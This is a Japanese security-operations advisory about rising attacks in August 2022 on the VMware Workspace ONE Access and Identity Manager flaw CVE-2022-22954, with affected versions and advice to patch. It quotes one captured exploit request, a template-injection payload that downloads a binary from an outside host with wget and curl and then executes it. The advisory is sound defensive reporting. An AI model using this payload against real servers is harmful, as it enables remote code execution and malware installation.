本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。
VMware製品の脆弱性(CVE-2022-22954)を狙った攻撃
8月は、VMWare製品(VMware Workspace ONE Access/VMware Identity Manager等)の脆弱性を狙った攻撃が増加しました。
本脆弱性(CVE-2022-22954)は今年4月に公開されたもので、リモートから任意のコードを実行されてしまう恐れがあります。VMWare社ではCriticalに分類されており、CVSS値も9.8と高い脆弱性となっています。
弊社SOCでは、本脆弱性を狙った攻撃は4/12(火)から断続的に観測していましたが、8/18(木)に急増しました。下図は、2022年8月の攻撃数推移グラフです。主な攻撃元の国は、リトアニアとアメリカとなっていました。
下図は、弊社SOCで検知した攻撃のパケットペイロードです。不正なスクリプトが書かれたファイルをwgetコマンドで取得して実行しようとする通信となっています。
|
GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cd /tmp; wget http://xx.xx.xx.xx/pedalcheta/cutie.x86_64; curl -O http://xx.xx.xx.xx/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 VMware")} HTTP/1.1 |
本脆弱性(CVE-2022-22954)の影響対象は以下の通りです。既にメーカーから対策済みのバージョンおよび回避策が公開されています。
影響対象の製品を使用している場合は、早急に対策することをお勧めいたします。
影響対象
- VMware Workspace ONE Access 21.08.0.1
- VMware Workspace ONE Access 21.08.0.0
- VMware Workspace ONE Access 20.10.0.1
- VMware Workspace ONE Access 20.10.0.0
- VMware Identity Manager 3.3.6
- VMware Identity Manager 3.3.5
- VMware Identity Manager 3.3.4
- VMware Identity Manager 3.3.3
- VMware vRealize Automation 8.x
- VMware vRealize Automation 7.6
- VMware vRealize Suite Lifecycle Manager 8.x
- VMware Cloud Foundation 4.x
- VMware Cloud Foundation 3.x
参考情報
マネージドサービス事業部
MBSD-SOC
MBSD-SOC
おすすめ記事
